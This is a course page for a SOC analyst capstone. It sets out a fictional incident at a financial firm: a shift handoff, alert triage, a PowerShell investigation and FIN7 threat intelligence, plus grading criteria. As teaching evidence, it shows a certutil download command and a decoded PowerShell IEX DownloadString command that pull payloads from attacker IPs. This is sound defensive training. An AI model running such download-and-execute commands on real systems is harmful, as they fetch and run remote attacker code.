CSY201 Week 12 Intermediate

Run a full SOC simulation before moving to reading resources.

Operating Systems & Security

Track your progress through this week's content

Opening Framing: Putting It All Together

Over the past eleven weeks, you've built a comprehensive foundation in security operations. You've learned monitoring, detection, triage, incident response, threat intelligence, hunting, and automation. Now it's time to apply everything in a realistic scenario.

This capstone simulates a day in a Security Operations Center. You'll handle an alert queue, investigate incidents, make decisions under pressure, document your work, and produce deliverables that demonstrate professional competency.

The scenario is designed to test not just individual skills, but your ability to integrate them—triaging efficiently, investigating thoroughly, responding appropriately, and communicating clearly.

Key insight: Real SOC work requires integrating many skills simultaneously. This capstone demonstrates that integration.

Capstone Scenario: Acme Financial Services

You're a SOC analyst at Acme Financial Services, a mid-sized financial institution. It's Monday morning, and you're starting your shift. 

Organization Profile:
- 2,500 employees
- Headquarters + 12 branch offices
- Customer-facing web applications
- Internal trading systems
- Regulated industry (financial services)

Security Stack:
- SIEM: Splunk Enterprise Security
- EDR: CrowdStrike Falcon
- Firewall: Palo Alto Networks
- Email: Microsoft 365 with Defender
- SOAR: Splunk SOAR

Your Role:
- Tier 1/2 SOC Analyst
- Shift: 8 AM - 4 PM
- Responsibilities: Alert triage, investigation, escalation

Current Situation:
- Weekend was quiet (automated systems only)
- Several alerts accumulated overnight
- One ongoing investigation from Friday (handed off)
- Threat intel report about financial sector targeting

Part 1: Shift Handoff Review

Review the handoff from the previous shift: 

SHIFT HANDOFF - Sunday Night to Monday Morning
Analyst: Sarah Chen
Time: 2024-01-14 23:45 UTC

OPEN INCIDENTS:

INC-2024-0112: Suspicious PowerShell Activity
- Status: Under investigation
- Host: TRADE-WS-07 (Trading floor workstation)
- User: mrodriguez (Senior Trader)
- Summary: EDR detected encoded PowerShell execution
- Actions taken: 
  * Alert triaged, escalated to Tier 2
  * Memory dump collected
  * User notified, asked not to use system
- Next steps: Malware analysis of memory dump
- Priority: HIGH

ALERT QUEUE STATUS:
- 23 alerts pending triage
- Oldest alert: 6 hours
- Mix of EDR, firewall, and email alerts

ENVIRONMENTAL NOTES:
- Patch Tuesday updates rolling out this week
- Trading systems maintenance window: Tuesday 2-4 AM
- New threat intel: APT targeting financial sector (see TI-2024-0115)

ITEMS FOR INCOMING ANALYST:
1. Continue INC-2024-0112 investigation
2. Review TI-2024-0115 and check for related IOCs
3. Clear alert backlog - prioritize by severity

Your Task:

  1. Review the handoff notes
  2. Prioritize your work for the shift
  3. Document your shift plan

Part 2: Alert Triage Queue

Your alert queue contains the following alerts. Triage each one.

Alert 1: Failed Login Attempts

ALERT: Multiple Failed Logins
Time: 2024-01-15 02:34 UTC
Source: Active Directory
Target: VPN Gateway
Account: svc_backup
Failures: 47 in 10 minutes
Source IPs: 185.220.101.XX (Tor exit node)
Status: Failures only, no success

Alert 2: Malware Detection

ALERT: Malware Detected - Blocked
Time: 2024-01-15 05:12 UTC  
Source: Email Gateway
Recipient: jthompson@acme-financial.com
Subject: "Invoice #INV-29481 - Urgent Payment Required"
Attachment: Invoice_29481.xlsm
Detection: Emotet dropper (macro-based)
Action: Blocked, quarantined

Alert 3: Unusual Data Transfer

ALERT: Large Outbound Data Transfer
Time: 2024-01-15 03:45 UTC
Source Host: FILESVR-02 (HR File Server)
Destination: 104.21.XX.XX (Cloudflare IP - file sharing service)
Size: 2.3 GB
Protocol: HTTPS
User Context: Unknown (service account)

Alert 4: Suspicious Process

ALERT: Suspicious Process Execution
Time: 2024-01-15 06:58 UTC
Host: ACCT-WS-22 (Accounting workstation)
User: dlee (Accounts Payable Clerk)
Process: certutil.exe -urlcache -f http://XX.XX.XX.XX/update.exe
Parent: outlook.exe
EDR Action: Blocked execution

Alert 5: Policy Violation

ALERT: Unauthorized Software Installation
Time: 2024-01-15 07:30 UTC
Host: MKT-WS-15 (Marketing workstation)
User: kpatel (Marketing Manager)
Software: TeamViewer (remote access tool)
Policy: Unauthorized remote access software

Your Task:

For each alert, document:

Part 3: Incident Investigation

Continue the investigation of INC-2024-0112 from the handoff: 

INCIDENT: INC-2024-0112
Title: Suspicious PowerShell Activity - Trading Workstation

TIMELINE (from previous investigation):
- 2024-01-12 16:45: User mrodriguez received email with link
- 2024-01-12 16:47: User clicked link, downloaded document
- 2024-01-12 16:48: Document opened, macro executed
- 2024-01-12 16:48: PowerShell spawned with encoded command
- 2024-01-12 16:49: EDR detected and alerted
- 2024-01-12 16:52: Alert triaged, escalated

EVIDENCE COLLECTED:
- Memory dump from TRADE-WS-07
- Email with original link
- Downloaded document (quarantined)
- EDR telemetry export

DECODED POWERSHELL COMMAND:
IEX (New-Object Net.WebClient).DownloadString('http://185.XX.XX.XX/stage2.ps1')

ADDITIONAL FINDINGS (your investigation):
- stage2.ps1 performs system reconnaissance
- Attempts to query Active Directory
- Beacons to 185.XX.XX.XX:443 every 60 seconds
- No lateral movement detected (yet)
- User has access to trading applications and financial data

Your Task:

  1. Complete the investigation timeline
  2. Identify all IOCs
  3. Map to MITRE ATT&CK techniques
  4. Determine scope of compromise
  5. Recommend containment actions
  6. Write incident report

Part 4: Threat Intelligence Application

Review the new threat intelligence report: 

THREAT INTELLIGENCE REPORT: TI-2024-0115
Title: FIN7 Campaign Targeting Financial Services
Classification: TLP:AMBER
Date: 2024-01-14

SUMMARY:
FIN7 threat group observed conducting active campaign against
financial services organizations in North America. Campaign
uses spearphishing with macro-enabled documents targeting
finance and trading departments.

TTPs OBSERVED:
- Initial Access: Spearphishing Attachment (T1566.001)
- Execution: PowerShell (T1059.001)
- Persistence: Scheduled Task (T1053.005)
- C2: Web Service (T1102)

IOCs:
IPs:
- 185.234.72.XX
- 91.219.236.XX
- 45.142.213.XX

Domains:
- secure-docs[.]finance
- invoice-portal[.]net
- payment-update[.]com

Hashes (SHA256):
- a1b2c3d4e5f6... (dropper)
- f6e5d4c3b2a1... (stage2)

RECOMMENDATIONS:
- Block IOCs at perimeter
- Hunt for related activity
- Brief high-risk users
- Increase monitoring of finance/trading systems

Your Task:

  1. Check if IOCs match INC-2024-0112
  2. Hunt for IOCs across environment
  3. Recommend detection rules
  4. Draft user awareness communication

Part 5: Deliverables

Your capstone submission must include:

1. Shift Plan (10 points)

2. Alert Triage Report (20 points)

3. Incident Investigation Report (30 points)

4. Threat Intelligence Response (20 points)

5. Shift Handoff Notes (10 points)

6. Reflection (10 points)

Evaluation Criteria

Your capstone will be evaluated on:

Criteria Points
Triage Accuracy: Correct classifications and priorities 20
Investigation Depth: Thorough analysis with evidence 25
Threat Intel Application: Effective use of intelligence 15
Documentation Quality: Clear, complete, professional 20
Decision Making: Sound judgment in recommendations 10
Reflection Quality: Thoughtful self-assessment 10

Total: 100 points. Projects scoring 80+ demonstrate job-ready competency.

Tips for Success

Time Management:
- Allocate time before starting
- Don't get stuck on one alert
- Leave time for documentation

Prioritization:
- High impact + high confidence = highest priority
- Consider business context
- Document your reasoning

Investigation:
- Follow the evidence
- Don't assume—verify
- Map to ATT&CK as you go

Documentation:
- Write as you work, not after
- Be specific and factual
- Include evidence for conclusions

Professionalism:
- Write for your audience
- Be clear and concise
- Proofread before submission

Week 12 Outcome Check

By completing this capstone, you will have demonstrated:

Congratulations! Completing this capstone demonstrates you have the skills expected of an entry-level SOC analyst.

🛡️ Capstone Extension: Harden & Defend

Enterprise SOCs do more than investigate. They harden systems, deploy detection, and document baselines for future response.

Deliverable: Hardening checklist + monitoring plan + runbook summary.

🎯 Hands-On Labs (Free & Essential)

Run a full SOC simulation before moving to reading resources.

🎮 TryHackMe: SOC Level 1

What you'll do: Triage alerts, investigate evidence, and make response decisions.
Why it matters: This mirrors day-to-day SOC analyst work.
Time estimate: 2-3 hours

Start TryHackMe SOC Level 1 →

📝 Lab Exercise: SOC Shift Report

Task: Produce a shift report with triage log, incident timeline, and executive summary.
Deliverable: One report that combines findings, actions, and recommendations.
Why it matters: Clear reporting is as critical as the investigation.
Time estimate: 1.5-2 hours

🎮 TryHackMe: SOC Level 2 (Stretch)

What you'll do: Tackle harder scenarios with deeper investigation steps.
Why it matters: Stretching here prepares you for real-world escalation.
Time estimate: 2-3 hours

Start TryHackMe SOC Level 2 →

🛡️ Lab: Hardening + Monitoring Extension

What you'll do: Complete the hardening and monitoring tasks defined above.
Deliverable: Baseline checklist + SIEM/EDR coverage plan + runbook summary.
Why it matters: Strong baselines reduce alert noise and improve response speed.
Time estimate: 2-3 hours

💡 Lab Tip: Treat documentation as part of the response, not an afterthought.

Resources

Reference these resources as you complete your capstone.

Week 12 Quiz

Test your understanding of SOC workflow integration and capstone decision-making.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz

Final Reflection

Reflection Prompt (400-500 words):

This capstone represents the culmination of your security operations journey in CSY201. You've progressed from understanding SOC concepts to performing analyst work in a realistic scenario.

Reflect on these questions:

A strong final reflection will honestly assess your growth, identify areas for continued learning, and articulate your career direction.

What's Next?

Completing CSY201 opens doors to specialized security topics:

Certifications to Consider:

Congratulations on completing CSY201! You now have a solid foundation in security operations—one of the most in-demand areas of cybersecurity. SOC skills are immediately applicable and highly valued. The monitoring, detection, investigation, and response capabilities you've developed will serve you throughout your security career. Keep learning, keep practicing, and welcome to the blue team!

← Previous: Week 11 Back to Course Overview →